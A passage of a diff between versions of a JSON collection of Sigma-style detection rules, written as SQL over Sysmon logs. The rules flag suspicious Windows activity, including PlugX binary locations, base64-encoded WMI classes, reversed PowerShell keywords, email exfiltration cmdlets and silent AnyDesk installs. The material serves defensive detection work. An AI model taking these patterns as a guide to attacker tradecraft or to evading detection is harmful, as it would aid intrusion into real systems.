Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious ScreenSave Change by Reg.exe", - "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", + "title": "Hardware Model Reconnaissance Via Wmic.EXE", + "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", - "tags": [ - "attack.privilege_escalation", - "attack.t1546.002" - ], - "falsepositives": [ - "GPO" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_reg_screensaver.yml" - }, - { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", - "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", + "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_wmic_recon_csproduct.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", - "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "title": "Execute Code with Pester.bat as Parent", + "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "status": "experimental", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1216" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_lolbin_pester.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "title": "Execution in Webserver Root Folder", + "id": "35efb964-e6a5-47ad-bbcd-19661854018d", "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Various applications", + "Tools that include ping or nslookup command invocations" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_susp_execution_path_webserver.yml" }, { - "title": "New Process Created Via Wmic.EXE", - "id": "526be59f-a573-4eea-b5f7-f0973207634d", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "status": "test", - "description": "Detects new process creation using WMIC via the \"process call create\" flag", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_process_creation.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.exfiltration" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Always Install Elevated MSI Spawned Cmd And Powershell", - "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "title": "MSExchange Transport Agent Installation", + "id": "83809e84-4475-4b69-bc3e-4aad8568612f", "status": "test", - "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentImage LIKE '%msi%' ESCAPE '\\' AND ParentImage LIKE '%tmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" + "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" }, { - "title": "Replace.exe Usage", - "id": "9292293b-8496-4715-9db6-37028dcda4b3", - "status": "experimental", - "description": "Detects the use of Replace.exe which can be used to replace file with another file", - "author": "frack113", + "title": "Suspicious Cabinet File Expansion", + "id": "9f107a84-532c-41af-b005-8d12a607639f", + "status": "test", + "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_replace.yml" + "filename": "proc_creation_win_expand_cabinet_files.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS 